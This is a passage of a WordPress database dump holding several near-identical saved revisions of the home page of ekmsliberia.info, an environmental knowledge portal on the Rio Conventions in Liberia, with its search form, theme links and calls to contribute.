class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>All Categories</option>\n	<option value=\"4\">News</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-theme/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-theme/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-themes/\" role=\"button\">\n						Explore All Themes\n					</a>\n			<h2>Explore by Institution</h2>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-09 15:48:51','2019-11-09 15:48:51','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(513,1,'2019-11-09 15:50:18','2019-11-09 15:50:18','<h2>Welcome to the EKMS</h2>		\n		<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"All Categories\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>All Categories</option>\n	<option value=\"4\">News</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-theme/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-theme/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-themes/\" role=\"button\">\n						Explore All Themes\n					</a>\n			<h2>Explore by Institution</h2>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-09 15:50:18','2019-11-09 15:50:18','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(514,1,'2019-11-09 15:51:10','2019-11-09 15:51:10','<h2>Welcome to the EKMS</h2>		\n		<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"All Categories\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>All Categories</option>\n	<option value=\"4\">News</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-theme/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-theme/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-themes/\" role=\"button\">\n						Explore All Themes\n					</a>\n			<h2>Explore by Institution</h2>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-09 15:51:10','2019-11-09 15:51:10','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(515,1,'2019-11-09 15:54:04','2019-11-09 15:54:04','<h2>Welcome to the EKMS</h2>		\n		<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"All Categories\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>All Categories</option>\n	<option value=\"4\">News</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-theme/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-theme/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-themes/\" role=\"button\">\n						Explore All Themes\n					</a>\n			<h2>Explore by Institution</h2>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-09 15:54:04','2019-11-09 15:54:04','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(516,1,'2019-11-09 15:54:42','2019-11-09 15:54:42','<h2>Welcome to the EKMS</h2>		\n		<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"All Categories\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>All Categories</option>\n	<option value=\"4\">News</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-theme/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-theme/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-themes/\" role=\"button\">\n						Explore All Themes\n					</a>\n			<h2>Explore by Institution</h2>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-09 15:54:42','2019-11-09 15:54:42','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(517,1,'2019-11-09 15:56:09','2019-11-09 15:56:09','<h2>Welcome to the EKMS</h2>		\n		<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"All Categories\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>All Categories</option>\n	<option value=\"4\">News</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-theme/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-theme/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-themes/\" role=\"button\">\n						Explore All Themes\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-09 15:56:09','2019-11-09 15:56:09','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(518,1,'2019-11-09 15:56:54','2019-11-09 15:56:54','<h2>Welcome to the EKMS</h2>		\n		<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"All Categories\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>All Categories</option>\n	<option value=\"4\">News</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-theme/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-theme/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-themes/\" role=\"button\">\n						Explore All Themes\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-09 15:56:54','2019-11-09 15:56:54','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(520,1,'2019-11-09 16:10:15','2019-11-09 16:10:15','<h2>Welcome to the EKMS</h2>		\n		<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"All Categories\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>All Categories</option>\n	<option value=\"4\">News</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-theme/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-theme/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-themes/\" role=\"button\">\n						Explore All Themes\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore Documents Database\n					</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-09 16:10:15','2019-11-09 16:10:15','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(521,1,'2019-11-09 16:15:41','2019-11-09 16:15:41','<h2>Welcome to the EKMS</h2>		\n		<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"All Categories\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>All Categories</option>\n	<option value=\"4\">News</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-theme/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-theme/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-themes/\" role=\"button\">\n						Explore All Themes\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore Documents Database\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-09 16:15:41','2019-11-09 16:15:41','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(523,1,'2019-11-09 16:35:51','2019-11-09 16:35:51','<h2>Welcome to the EKMS</h2>		\n		<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"All Categories\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>All Categories</option>\n	<option value=\"4\">News</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-theme/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-theme/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-themes/\" role=\"button\">\n						Explore All Themes\n					</a>\n			<h2>Explore by Institution</h2>		\n		Explore Government and Other Institutions that have direct linkages with environmental policies and development.		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Documents</h2>		\n		Explore the EKMS Document Database.		\n			<a href=\"https://ekmsliberia.info/documents-and-other-resources/\" role=\"button\">\n						Explore Documents Database\n					</a>\n			<h1>Multilateral Environmental Agreements</h1>		\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\n					<a href=\"#\">\n						Click me\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-09 16:35:51','2019-11-09 16:35:51','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(524,1,'2019-11-09 16:38:18','2019-11-09 16:38:18','<h2>Welcome to the EKMS</h2>		\n		<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"All Categories\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>All Categories</option>\n	<option value=\"4\">News</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a 